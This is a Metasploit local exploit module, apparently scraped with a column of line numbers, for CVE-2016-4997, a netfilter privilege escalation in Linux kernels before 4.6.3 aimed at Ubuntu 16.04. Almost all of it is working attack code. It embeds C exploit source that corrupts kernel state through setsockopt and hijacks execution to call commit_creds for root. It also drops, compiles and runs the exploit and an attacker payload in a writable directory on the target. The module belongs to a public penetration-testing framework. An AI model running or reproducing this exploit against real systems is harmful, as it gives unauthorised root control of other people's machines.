1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',
'Description' => %q{
This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently
only works against Ubuntu 16.04 (not 16.04.1) with kernel
4.4.0-21-generic.
Several conditions have to be met for successful exploitation:
Ubuntu:
1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)
2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile
Kernel 4.4.0-31-generic and newer are not vulnerable.
We write the ascii files and compile on target instead of locally since metasm bombs for not
having cdefs.h (even if locally installed)
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # Module
'vnik' # Discovery
],
'DisclosureDate' => 'Jun 03 2016',
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Ubuntu', { } ]
#[ 'Fedora', { } ]
],
'DefaultTarget' => 0,
'References' =>
[
[ 'EDB', '40049'],
[ 'CVE', '2016-4997'],
[ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c']
]
))
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),
OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
], self.class)
end
def check
def iptables_loaded?()
# user@ubuntu:~$ cat /proc/modules | grep ip_tables
# ip_tables 28672 1 iptable_filter, Live 0x0000000000000000
# x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000
vprint_status('Checking if ip_tables is loaded in kernel')
if target.name == "Ubuntu"
iptables = cmd_exec('cat /proc/modules | grep ip_tables')
if iptables.include?('ip_tables')
vprint_good('ip_tables.ko is loaded')
else
print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')
end
return iptables.include?('ip_tables')
elsif target.name == "Fedora"
iptables = cmd_exec('cat /proc/modules | grep iptable_raw')
if iptables.include?('iptable_raw')
vprint_good('iptable_raw is loaded')
else
print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')
end
return iptables.include?('iptable_raw')
else
return false
end
end
def shemsham_installed?()
# we want this to be false.
vprint_status('Checking if shem or sham are installed')
shemsham = cmd_exec('cat /proc/cpuinfo')
if shemsham.include?('shem')
print_error('shem installed, system not vulnerable.')
elsif shemsham.include?('sham')
print_error('sham installed, system not vulnerable.')
else
vprint_good('shem and sham not present.')
end
return (shemsham.include?('shem') or shemsham.include?('sham'))
end
if iptables_loaded?() and not shemsham_installed?()
return CheckCode::Appears
else
return CheckCode::Safe
end
end
def exploit
# first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
def has_prereqs?()
vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')
if target.name == "Ubuntu"
lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')
if lib.include?('install')
vprint_good('libc6-dev-i386 is installed')
else
print_error('libc6-dev-i386 is not installed. Compiling will fail.')
end
multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')
if multilib.include?('install')
vprint_good('gcc-multilib is installed')
else
print_error('gcc-multilib is not installed. Compiling will fail.')
end
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
else
print_error('gcc is not installed. Compiling will fail.')
end
return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')
elsif target.name == "Fedora"
lib = cmd_exec('dnf list installed | grep -E \'(glibc-devel.i686|libgcc.i686)\'')
if lib.include?('glibc')
vprint_good('glibc-devel.i686 is installed')
else
print_error('glibc-devel.i686 is not installed. Compiling will fail.')
end
if lib.include?('libgcc')
vprint_good('libgcc.i686 is installed')
else
print_error('libgcc.i686 is not installed. Compiling will fail.')
end
multilib = false #not implemented
gcc = false #not implemented
return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib
else
return false
end
end
compile = false
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
if has_prereqs?()
compile = true
vprint_status('Live compiling exploit on system')
else
vprint_status('Dropping pre-compiled exploit on system')
end
end
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
payload_file = rand_text_alpha(8)
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
# direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here
# removed #include <netinet/in.h> per busterb comment in PR 7326
decr = %q{
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <netinet/in.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MALLOC_SIZE 66*1024
int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;
sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("socket");
return -1;
}
data = malloc(MALLOC_SIZE);
if (data == NULL) {
perror("malloc");
return -1;
}
memset(data, 0, MALLOC_SIZE);
repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;
entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
strcpy(ematch->u.user.name, "icmp");
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!
uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;
ematch->u.match_size = (short)0xffff;
target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;
printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
for (i = 0; i < 0xffffff/2+1; i++) {
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
}
close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");
return 0;
}
int main(void) {
void *stack;
int ret;
printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
ret = unshare(CLONE_NEWUSER);
if (ret == -1) {
perror("unshare");
return -1;
}
stack = (void *) malloc(65536);
if (stack == NULL) {
perror("malloc");
return -1;
}
clone(decr, stack + 65536, CLONE_NEWNET, NULL);
sleep(1);
return 0;
}
}
# direct copy of code from exploit-db
pwn = %q{
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
void __attribute__((regparm(3))) privesc() {
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
int main() {
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);
void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
memset(shellcode, 0, 0x300000);
void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);
printf("[+] Escalating privs...\n");
int fd = open("/dev/ptmx", O_RDWR);
close(fd);
assert(!getuid());
printf("[+] We've got root!");
return execl("/bin/bash", "-sh", NULL);
}
}
# the original code printed a line. However, this is hard to detect due to threading.
# so instead we can write a file in /tmp to catch.
decr.gsub!(/printf\("\[\+\] Done\! Now run \.\/pwn\\n"\);/,
"int fd2 = open(\"#{env_ready_file}\", O_RDWR|O_CREAT, 0777);close(fd2);" )
# patch in to run our payload
pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/,
"execl(\"#{payload_path}\", NULL);")
def pwn(payload_path, pwn_file, pwn, compile)
# lets write our payload since everythings set for priv esc
vprint_status("Writing payload to #{payload_path}")
write_file(payload_path, generate_payload_exe)
cmd_exec("chmod 555 #{payload_path}")
register_file_for_cleanup(payload_path)
# now lets drop part 2, and finish up.
rm_f pwn_file
if compile
print_status "Writing pwn executable to #{pwn_file}.c"
rm_f "#{pwn_file}.c"
write_file("#{pwn_file}.c", pwn)
cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
register_file_for_cleanup("#{pwn_file}.c")
else
print_status "Writing pwn executable to #{pwn_file}"
write_file(pwn_file, pwn)
end
register_file_for_cleanup(pwn_file)
cmd_exec("chmod +x #{pwn_file}; #{pwn_file}")
end
if not compile # we need to override with our pre-created binary
# pwn file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')
fd = ::File.open( path, "rb")
pwn = fd.read(fd.stat.size)
fd.close
# desc file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')
fd = ::File.open( path, "rb")
decr = fd.read(fd.stat.size)
fd.close
# overwrite the hardcoded variable names in the compiled versions
env_ready_file = '/tmp/okDjTFSS'
payload_path = '/tmp/2016_4997_payload'
end
# check for shortcut
if datastore['REEXPLOIT']
pwn(payload_path, pwn_file, pwn, compile)
else
rm_f desc_file
if compile
print_status "Writing desc executable to #{desc_file}.c"
rm_f "#{desc_file}.c"
write_file("#{desc_file}.c", decr)
register_file_for_cleanup("#{desc_file}.c")
output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
else
write_file(desc_file, decr)
end
rm_f env_ready_file
register_file_for_cleanup(env_ready_file)
#register_file_for_cleanup(desc_file)
if not file_exist?(desc_file)
vprint_error("gcc failure output: #{output}")
fail_with(Failure::Unknown, "#{desc_file}.c failed to compile")
end
if target.name == "Ubuntu"
vprint_status "Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created."
elsif target.name == "Fedora"
vprint_status "Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created."
end
cmd_exec("chmod +x #{desc_file}; #{desc_file}")
sec_waited = 0
until sec_waited > datastore['MAXWAIT'] do
Rex.sleep(1)
if sec_waited % 10 == 0
vprint_status("Waited #{sec_waited}s so far")
end
if file_exist?(env_ready_file)
print_good("desc finished, env ready.")
pwn(payload_path, pwn_file, pwn, compile)
return
end
sec_waited +=1
end
end
end
end
|